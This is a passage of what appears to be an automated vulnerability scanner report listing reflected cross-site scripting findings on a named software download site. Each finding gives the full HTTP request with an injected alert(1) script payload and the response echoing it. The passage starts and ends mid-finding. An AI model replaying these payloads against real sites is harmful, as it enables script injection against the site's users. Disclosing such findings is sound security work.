Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1" />
...[SNIP]...

4.1567. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ac5"><script>alert(1)</script>c5960a7fdd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6" />
...[SNIP]...

4.1568. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff596"><script>alert(1)</script>281d8a3753f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1" />
...[SNIP]...

4.1569. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b459f"><script>alert(1)</script>c9490a838b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3" />
...[SNIP]...

4.1570. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e63"><script>alert(1)</script>0dbe9fe771e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1" />
...[SNIP]...

4.1571. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f09b"><script>alert(1)</script>50aa1ce8d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40" />
...[SNIP]...

4.1572. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea4d"><script>alert(1)</script>a510634e8be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1" />
...[SNIP]...

4.1573. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca996"><script>alert(1)</script>a4a17688857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857" />
...[SNIP]...

4.1574. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea43c"><script>alert(1)</script>1d1fba47ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1" />
...[SNIP]...

4.1575. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83928"><script>alert(1)</script>a5b455172b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2" />
...[SNIP]...

4.1576. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9892e"><script>alert(1)</script>5d9734d7e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1" />
...[SNIP]...

4.1577. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430b8"><script>alert(1)</script>a87f0fbe7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8" />
...[SNIP]...

4.1578. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6ec"><script>alert(1)</script>984fa8fe340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1" />
...[SNIP]...

4.1579. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdb3"><script>alert(1)</script>4b97b90929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929" />
...[SNIP]...

4.1580. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bd1"><script>alert(1)</script>f6291253f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1" />
...[SNIP]...

4.1581. http://www.x64bitdownload.com/64-bit-par-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0759"><script>alert(1)</script>6fd3ce475e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

